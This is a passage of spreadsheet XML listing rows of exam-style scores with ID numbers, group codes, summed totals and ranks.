      <c r="C9" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D9" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E9" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="F9" s="8" t="n">
        <v>64.6</v>
      </c>
      <c r="G9" s="8"/>
      <c r="H9" s="8" t="n">
        <f aca="false">SUM(E9:G9)</f>
        <v>131</v>
      </c>
      <c r="I9" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="10" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A10" s="8" t="n">
        <v>4100015</v>
      </c>
      <c r="B10" s="8" t="n">
        <v>1314010312</v>
      </c>
      <c r="C10" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D10" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E10" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="F10" s="8" t="n">
        <v>69</v>
      </c>
      <c r="G10" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H10" s="8" t="n">
        <f aca="false">SUM(E10:G10)</f>
        <v>126.2</v>
      </c>
      <c r="I10" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="11" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A11" s="8" t="n">
        <v>4100015</v>
      </c>
      <c r="B11" s="8" t="n">
        <v>1314010314</v>
      </c>
      <c r="C11" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D11" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E11" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F11" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="G11" s="8"/>
      <c r="H11" s="8" t="n">
        <f aca="false">SUM(E11:G11)</f>
        <v>122</v>
      </c>
      <c r="I11" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="12" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A12" s="8" t="n">
        <v>4100016</v>
      </c>
      <c r="B12" s="8" t="n">
        <v>1314010317</v>
      </c>
      <c r="C12" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D12" s="8" t="s">
        <v>89</v>
      </c>
      <c r="E12" s="8" t="n">
        <v>43.6</v>
      </c>
      <c r="F12" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="G12" s="8"/>
      <c r="H12" s="8" t="n">
        <f aca="false">SUM(E12:G12)</f>
        <v>106.2</v>
      </c>
      <c r="I12" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="13" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A13" s="8" t="n">
        <v>4100016</v>
      </c>
      <c r="B13" s="8" t="n">
        <v>1314010316</v>
      </c>
      <c r="C13" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D13" s="8" t="s">
        <v>89</v>
      </c>
      <c r="E13" s="8" t="n">
        <v>45</v>
      </c>
      <c r="F13" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="G13" s="8"/>
      <c r="H13" s="8" t="n">
        <f aca="false">SUM(E13:G13)</f>
        <v>103.2</v>
      </c>
      <c r="I13" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="14" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A14" s="8" t="n">
        <v>4100016</v>
      </c>
      <c r="B14" s="8" t="n">
        <v>1314010315</v>
      </c>
      <c r="C14" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D14" s="8" t="s">
        <v>89</v>
      </c>
      <c r="E14" s="8" t="n">
        <v>46.6</v>
      </c>
      <c r="F14" s="8" t="n">
        <v>50.8</v>
      </c>
      <c r="G14" s="8"/>
      <c r="H14" s="8" t="n">
        <f aca="false">SUM(E14:G14)</f>
        <v>97.4</v>
      </c>
      <c r="I14" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="15" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A15" s="8" t="n">
        <v>4100016</v>
      </c>
      <c r="B15" s="8" t="n">
        <v>1314010318</v>
      </c>
      <c r="C15" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D15" s="8" t="s">
        <v>89</v>
      </c>
      <c r="E15" s="8" t="n">
        <v>40.8</v>
      </c>
      <c r="F15" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G15" s="8"/>
      <c r="H15" s="8" t="n">
        <f aca="false">SUM(E15:G15)</f>
        <v>96.2</v>
      </c>
      <c r="I15" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="16" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A16" s="8" t="n">
        <v>4100026</v>
      </c>
      <c r="B16" s="8" t="n">
        <v>1314010319</v>
      </c>
      <c r="C16" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D16" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E16" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F16" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G16" s="8"/>
      <c r="H16" s="8" t="n">
        <f aca="false">SUM(E16:G16)</f>
        <v>122</v>
      </c>
      <c r="I16" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="17" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A17" s="8" t="n">
        <v>4100026</v>
      </c>
      <c r="B17" s="8" t="n">
        <v>1314010321</v>
      </c>
      <c r="C17" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D17" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E17" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="F17" s="8" t="n">
        <v>50.2</v>
      </c>
      <c r="G17" s="8"/>
      <c r="H17" s="8" t="n">
        <f aca="false">SUM(E17:G17)</f>
        <v>108.8</v>
      </c>
      <c r="I17" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="18" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A18" s="8" t="n">
        <v>4100026</v>
      </c>
      <c r="B18" s="8" t="n">
        <v>1314010320</v>
      </c>
      <c r="C18" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D18" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E18" s="8" t="n">
        <v>37</v>
      </c>
      <c r="F18" s="8" t="n">
        <v>54.2</v>
      </c>
      <c r="G18" s="8"/>
      <c r="H18" s="8" t="n">
        <f aca="false">SUM(E18:G18)</f>
        <v>91.2</v>
      </c>
      <c r="I18" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="19" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A19" s="8" t="n">
        <v>4100026</v>
      </c>
      <c r="B19" s="8" t="n">
        <v>1314010322</v>
      </c>
      <c r="C19" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D19" s="8" t="s">
        <v>87</v>
      </c>
      <c r="E19" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F19" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G19" s="8"/>
      <c r="H19" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I19" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="20" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A20" s="8" t="n">
        <v>4100028</v>
      </c>
      <c r="B20" s="8" t="n">
        <v>1314010323</v>
      </c>
      <c r="C20" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D20" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E20" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="F20" s="8" t="n">
        <v>55.4</v>
      </c>
      <c r="G20" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H20" s="8" t="n">
        <f aca="false">SUM(E20:G20)</f>
        <v>124.8</v>
      </c>
      <c r="I20" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="21" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A21" s="8" t="n">
        <v>4100028</v>
      </c>
      <c r="B21" s="8" t="n">
        <v>1314010325</v>
      </c>
      <c r="C21" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D21" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E21" s="8" t="n">
        <v>60.6</v>
      </c>
      <c r="F21" s="8" t="n">
        <v>57.8</v>
      </c>
      <c r="G21" s="8"/>
      <c r="H21" s="8" t="n">
        <f aca="false">SUM(E21:G21)</f>
        <v>118.4</v>
      </c>
      <c r="I21" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="22" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A22" s="8" t="n">
        <v>4100028</v>
      </c>
      <c r="B22" s="8" t="n">
        <v>1314010324</v>
      </c>
      <c r="C22" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D22" s="8" t="s">
        <v>88</v>
      </c>
      <c r="E22" s="8" t="n">
        <v>46.2</v>
      </c>
      <c r="F22" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="G22" s="8"/>
      <c r="H22" s="8" t="n">
        <f aca="false">SUM(E22:G22)</f>
        <v>95</v>
      </c>
      <c r="I22" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="23" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A23" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B23" s="8" t="n">
        <v>1314010330</v>
      </c>
      <c r="C23" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D23" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E23" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="F23" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G23" s="8" t="n">
        <v>18.5</v>
      </c>
      <c r="H23" s="8" t="n">
        <f aca="false">SUM(E23:G23)</f>
        <v>140.7</v>
      </c>
      <c r="I23" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="24" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A24" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B24" s="8" t="n">
        <v>1314010326</v>
      </c>
      <c r="C24" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D24" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E24" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="F24" s="8" t="n">
        <v>73.2</v>
      </c>
      <c r="G24" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H24" s="8" t="n">
        <f aca="false">SUM(E24:G24)</f>
        <v>140</v>
      </c>
      <c r="I24" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="25" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A25" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B25" s="8" t="n">
        <v>1314010403</v>
      </c>
      <c r="C25" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D25" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E25" s="8" t="n">
        <v>58.8</v>
      </c>
      <c r="F25" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="G25" s="8" t="n">
        <v>14.5</v>
      </c>
      <c r="H25" s="8" t="n">
        <f aca="false">SUM(E25:G25)</f>
        <v>135.7</v>
      </c>
      <c r="I25" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="26" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A26" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B26" s="8" t="n">
        <v>1314010405</v>
      </c>
      <c r="C26" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D26" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E26" s="8" t="n">
        <v>73.2</v>
      </c>
      <c r="F26" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="G26" s="8" t="n">
        <v>2</v>
      </c>
      <c r="H26" s="8" t="n">
        <f aca="false">SUM(E26:G26)</f>
        <v>134.8</v>
      </c>
      <c r="I26" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="27" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A27" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B27" s="8" t="n">
        <v>1314010406</v>
      </c>
      <c r="C27" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D27" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E27" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="F27" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G27" s="8" t="n">
        <v>7</v>
      </c>
      <c r="H27" s="8" t="n">
        <f aca="false">SUM(E27:G27)</f>
        <v>132.2</v>
      </c>
      <c r="I27" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="28" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A28" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B28" s="8" t="n">
        <v>1314010328</v>
      </c>
      <c r="C28" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D28" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E28" s="8" t="n">
        <v>57</v>
      </c>
      <c r="F28" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G28" s="8" t="n">
        <v>13</v>
      </c>
      <c r="H28" s="8" t="n">
        <f aca="false">SUM(E28:G28)</f>
        <v>128</v>
      </c>
      <c r="I28" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="29" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A29" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B29" s="8" t="n">
        <v>1314010404</v>
      </c>
      <c r="C29" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D29" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E29" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F29" s="8" t="n">
        <v>53.2</v>
      </c>
      <c r="G29" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H29" s="8" t="n">
        <f aca="false">SUM(E29:G29)</f>
        <v>116.4</v>
      </c>
      <c r="I29" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="30" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A30" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B30" s="8" t="n">
        <v>1314010327</v>
      </c>
      <c r="C30" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D30" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E30" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="F30" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="G30" s="8"/>
      <c r="H30" s="8" t="n">
        <f aca="false">SUM(E30:G30)</f>
        <v>112</v>
      </c>
      <c r="I30" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="31" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A31" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B31" s="8" t="n">
        <v>1314010402</v>
      </c>
      <c r="C31" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D31" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E31" s="8" t="n">
        <v>51.4</v>
      </c>
      <c r="F31" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="G31" s="8"/>
      <c r="H31" s="8" t="n">
        <f aca="false">SUM(E31:G31)</f>
        <v>111.8</v>
      </c>
      <c r="I31" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="32" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A32" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B32" s="8" t="n">
        <v>1314010329</v>
      </c>
      <c r="C32" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D32" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E32" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="F32" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G32" s="8" t="n">
        <v>1</v>
      </c>
      <c r="H32" s="8" t="n">
        <f aca="false">SUM(E32:G32)</f>
        <v>102.4</v>
      </c>
      <c r="I32" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="33" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A33" s="8" t="n">
        <v>4100030</v>
      </c>
      <c r="B33" s="8" t="n">
        <v>1314010401</v>
      </c>
      <c r="C33" s="8" t="s">
        <v>91</v>
      </c>
      <c r="D33" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E33" s="8" t="n">
        <v>52.6</v>
      </c>
      <c r="F33" s="8" t="n">
        <v>46</v>
      </c>
      <c r="G33" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H33" s="8" t="n">
        <f aca="false">SUM(E33:G33)</f>
        <v>101.6</v>
      </c>
      <c r="I33" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="34" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A34" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B34" s="8" t="n">
        <v>1314010419</v>
      </c>
      <c r="C34" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D34" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E34" s="8" t="n">
        <v>70.2</v>
      </c>
      <c r="F34" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G34" s="8" t="n">
        <v>11.5</v>
      </c>
      <c r="H34" s="8" t="n">
        <f aca="false">SUM(E34:G34)</f>
        <v>143.1</v>
      </c>
      <c r="I34" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="35" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A35" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B35" s="8" t="n">
        <v>1314010420</v>
      </c>
      <c r="C35" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D35" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E35" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="F35" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="G35" s="8" t="n">
        <v>2</v>
      </c>
      <c r="H35" s="8" t="n">
        <f aca="false">SUM(E35:G35)</f>
        <v>123.2</v>
      </c>
      <c r="I35" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="36" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A36" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B36" s="8" t="n">
        <v>1314010410</v>
      </c>
      <c r="C36" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D36" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E36" s="8" t="n">
        <v>54</v>
      </c>
      <c r="F36" s="8" t="n">
        <v>64.4</v>
      </c>
      <c r="G36" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H36" s="8" t="n">
        <f aca="false">SUM(E36:G36)</f>
        <v>121.4</v>
      </c>
      <c r="I36" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="37" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A37" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B37" s="8" t="n">
        <v>1314010412</v>
      </c>
      <c r="C37" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D37" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E37" s="8" t="n">
        <v>63.4</v>
      </c>
      <c r="F37" s="8" t="n">
        <v>49.2</v>
      </c>
      <c r="G37" s="8" t="n">
        <v>8</v>
      </c>
      <c r="H37" s="8" t="n">
        <f aca="false">SUM(E37:G37)</f>
        <v>120.6</v>
      </c>
      <c r="I37" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="38" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A38" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B38" s="8" t="n">
        <v>1314010409</v>
      </c>
      <c r="C38" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D38" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E38" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="F38" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="G38" s="8" t="n">
        <v>16</v>
      </c>
      <c r="H38" s="8" t="n">
        <f aca="false">SUM(E38:G38)</f>
        <v>119</v>
      </c>
      <c r="I38" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="39" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A39" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B39" s="8" t="n">
        <v>1314010421</v>
      </c>
      <c r="C39" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D39" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E39" s="8" t="n">
        <v>59.6</v>
      </c>
      <c r="F39" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="G39" s="8"/>
      <c r="H39" s="8" t="n">
        <f aca="false">SUM(E39:G39)</f>
        <v>116.2</v>
      </c>
      <c r="I39" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="40" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A40" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B40" s="8" t="n">
        <v>1314010411</v>
      </c>
      <c r="C40" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D40" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E40" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="F40" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="G40" s="8" t="n">
        <v>6.5</v>
      </c>
      <c r="H40" s="8" t="n">
        <f aca="false">SUM(E40:G40)</f>
        <v>113.9</v>
      </c>
      <c r="I40" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="41" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A41" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B41" s="8" t="n">
        <v>1314010414</v>
      </c>
      <c r="C41" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D41" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E41" s="8" t="n">
        <v>47.6</v>
      </c>
      <c r="F41" s="8" t="n">
        <v>61.4</v>
      </c>
      <c r="G41" s="8" t="n">
        <v>1</v>
      </c>
      <c r="H41" s="8" t="n">
        <f aca="false">SUM(E41:G41)</f>
        <v>110</v>
      </c>
      <c r="I41" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="42" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A42" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B42" s="8" t="n">
        <v>1314010417</v>
      </c>
      <c r="C42" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D42" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E42" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F42" s="8" t="n">
        <v>54</v>
      </c>
      <c r="G42" s="8"/>
      <c r="H42" s="8" t="n">
        <f aca="false">SUM(E42:G42)</f>
        <v>108.8</v>
      </c>
      <c r="I42" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="43" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A43" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B43" s="8" t="n">
        <v>1314010416</v>
      </c>
      <c r="C43" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D43" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E43" s="8" t="n">
        <v>50.8</v>
      </c>
      <c r="F43" s="8" t="n">
        <v>43.2</v>
      </c>
      <c r="G43" s="8" t="n">
        <v>14.5</v>
      </c>
      <c r="H43" s="8" t="n">
        <f aca="false">SUM(E43:G43)</f>
        <v>108.5</v>
      </c>
      <c r="I43" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="44" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A44" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B44" s="8" t="n">
        <v>1314010413</v>
      </c>
      <c r="C44" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D44" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E44" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="F44" s="8" t="n">
        <v>47.6</v>
      </c>
      <c r="G44" s="8" t="n">
        <v>6.5</v>
      </c>
      <c r="H44" s="8" t="n">
        <f aca="false">SUM(E44:G44)</f>
        <v>103.5</v>
      </c>
      <c r="I44" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="45" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A45" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B45" s="8" t="n">
        <v>1314010415</v>
      </c>
      <c r="C45" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D45" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E45" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F45" s="8" t="n">
        <v>46.6</v>
      </c>
      <c r="G45" s="8"/>
      <c r="H45" s="8" t="n">
        <f aca="false">SUM(E45:G45)</f>
        <v>101.2</v>
      </c>
      <c r="I45" s="8" t="n">
        <v>12</v>
      </c>
    </row>
    <row r="46" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A46" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B46" s="8" t="n">
        <v>1314010423</v>
      </c>
      <c r="C46" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D46" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E46" s="8" t="n">
        <v>48.6</v>
      </c>
      <c r="F46" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="G46" s="8"/>
      <c r="H46" s="8" t="n">
        <f aca="false">SUM(E46:G46)</f>
        <v>99.8</v>
      </c>
      <c r="I46" s="8" t="n">
        <v>13</v>
      </c>
    </row>
    <row r="47" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A47" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B47" s="8" t="n">
        <v>1314010418</v>
      </c>
      <c r="C47" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D47" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E47" s="8" t="n">
        <v>43.8</v>
      </c>
      <c r="F47" s="8" t="n">
        <v>52.2</v>
      </c>
      <c r="G47" s="8" t="n">
        <v>1</v>
      </c>
      <c r="H47" s="8" t="n">
        <f aca="false">SUM(E47:G47)</f>
        <v>97</v>
      </c>
      <c r="I47" s="8" t="n">
        <v>14</v>
      </c>
    </row>
    <row r="48" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A48" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B48" s="8" t="n">
        <v>1314010407</v>
      </c>
      <c r="C48" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D48" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E48" s="8" t="n">
        <v>48.8</v>
      </c>
      <c r="F48" s="8" t="n">
        <v>47.8</v>
      </c>
      <c r="G48" s="8"/>
      <c r="H48" s="8" t="n">
        <f aca="false">SUM(E48:G48)</f>
        <v>96.6</v>
      </c>
      <c r="I48" s="8" t="n">
        <v>15</v>
      </c>
    </row>
    <row r="49" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A49" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B49" s="8" t="n">
        <v>1314010408</v>
      </c>
      <c r="C49" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D49" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E49" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F49" s="8" t="n">
        <v>42.8</v>
      </c>
      <c r="G49" s="8"/>
      <c r="H49" s="8" t="n">
        <f aca="false">SUM(E49:G49)</f>
        <v>95.8</v>
      </c>
      <c r="I49" s="8" t="n">
        <v>16</v>
      </c>
    </row>
    <row r="50" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A50" s="8" t="n">
        <v>4100031</v>
      </c>
      <c r="B50" s="8" t="n">
        <v>1314010422</v>
      </c>
      <c r="C50" s="8" t="s">
        <v>93</v>
      </c>
      <c r="D50" s="8" t="s">
        <v>92</v>
      </c>
      <c r="E50" s="8" t="n">
        <v>49.6</v>
      </c>
      <c r="F50" s="8" t="n">
        <v>42.8</v>
      </c>
      <c r="G50" s="8"/>
      <c r="H50" s="8" t="n">
        <f aca="false">SUM(E50:G50)</f>
        <v>92.4</v>
      </c>
      <c r="I50" s="8" t="n">
        <v>17</v>
      </c>
    </row>
    <row r="51" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
